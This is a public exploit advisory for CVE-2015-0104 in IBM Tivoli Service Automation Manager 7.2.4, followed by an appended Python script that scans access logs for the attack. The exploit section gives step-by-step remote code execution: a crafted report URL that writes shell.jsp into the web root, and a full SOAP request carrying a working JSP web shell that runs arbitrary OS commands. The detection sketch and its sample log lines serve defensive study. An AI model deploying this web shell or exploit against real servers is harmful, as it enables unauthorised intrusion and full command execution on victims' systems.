IBM Tivoli Service Automation Manager 7.2.4 – Remote Code Execution

  • Author: Jakub Palaczynski
    Date: 2014-12-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36002/
  • # Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
    # Date: 12\12\2014
    # Exploit Author: Jakub Palaczynski
    # Vendor Homepage: http://www.ibm.com/
    # Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
    # VU/CVE: VU#782708, CVE-2015-0104
    
    1. Create a report.
    2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
    3. Intercept the SOAP request generated by submitting the form from the previous step and inject the JSP payload. Sample SOAP request:
    
    POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1
    
    Host: site
    Content-Length: xxx
    
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%> 
    
    <% 
    
    try {
    
    String cmd; 
    
    String[] cmdarr; 
    
    String OS = System.getProperty("os.name"); 
    
    if (request.getParameter("cmd") != null) { 
    
    cmd = new String (request.getParameter("cmd")); 
    
    if (OS.startsWith("Windows")) { 
    
     cmdarr = new String [] {"cmd", "/C", cmd}; 
    
    } 
    
    else { 
    
     cmdarr = new String [] {"/bin/sh", "-c", cmd}; 
    
    } 
    
    Process p = Runtime.getRuntime().exec(cmdarr); 
    
    OutputStream os = p.getOutputStream(); 
    
    InputStream in = p.getInputStream(); 
    
    DataInputStream dis = new DataInputStream(in); 
    
    String disr = dis.readLine(); 
    
    while ( disr != null ) { 
    
    out.println(disr); 
    
    disr = dis.readLine(); 
    
    } 
    
    } 
    
    } catch (Exception e) { e.printStackTrace();}
    
    %>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>
    
    4. The web shell is now ready to use at the path specified in the __document parameter's value.
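
Both the GET in step 2 and the POST in step 3 carry the output path in the `__document` query parameter, so web-server access logs record it. The following detection sketch is an added example, not part of the original advisory or of any IBM tooling; the log lines are constructed, and it assumes legitimate report documents end in `.rptdocument`.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not real traffic); addresses and names are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2014:10:00:01 +0000] "GET /maximo/report?__document=/system/path/web/root/shell.jsp&__report=example.rptdesign&appname=EXAMPLE&__requestid=&reportNum= HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Dec/2014:10:00:09 +0000] "POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=example.rptdesign&appname=EXAMPLE&__requestid=&__sessionId=PLACEHOLDER HTTP/1.1" 200 2048',
    '10.0.0.8 - - [12/Dec/2014:10:02:00 +0000] "GET /maximo/report?__document=/data/reports/inventory.rptdocument&__report=inventory.rptdesign&appname=EXAMPLE HTTP/1.1" 200 9001',
    '10.0.0.8 - - [12/Dec/2014:10:03:00 +0000] "GET /maximo/report?__report=inventory.rptdesign&appname=EXAMPLE HTTP/1.1" 200 9001',
    '10.0.0.9 - - [12/Dec/2014:10:04:00 +0000] "GET /maximo/ui/login HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
EXECUTABLE_EXT = (".jsp", ".jspx", ".jspf")  # extensions a servlet container compiles and runs
EXPECTED_EXT = ".rptdocument"  # assumption: extension of legitimate report documents


def document_findings(target):
    """Return the reasons a request target's __document value looks wrong."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/maximo/report"):
        return []
    findings = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get("__document", []):
        # parse_qs decodes once; decode again and fold case and separators
        doc = unquote(raw).replace("\\", "/").strip().lower()
        if doc.endswith(EXECUTABLE_EXT):
            findings.append("executable-extension")
        elif doc and not doc.endswith(EXPECTED_EXT):
            findings.append("unexpected-extension")
    return findings


def scan_log(lines):
    """Return (line_number, method, findings) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = document_findings(match["target"])
        if findings:
            hits.append((number, match["method"], findings))
    return hits


if __name__ == "__main__":
    for number, method, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {method} {', '.join(findings)}")
```

The same normalisation and extension check can be applied as a request filter in front of `/maximo/report` on systems that cannot yet be upgraded past 7.2.4.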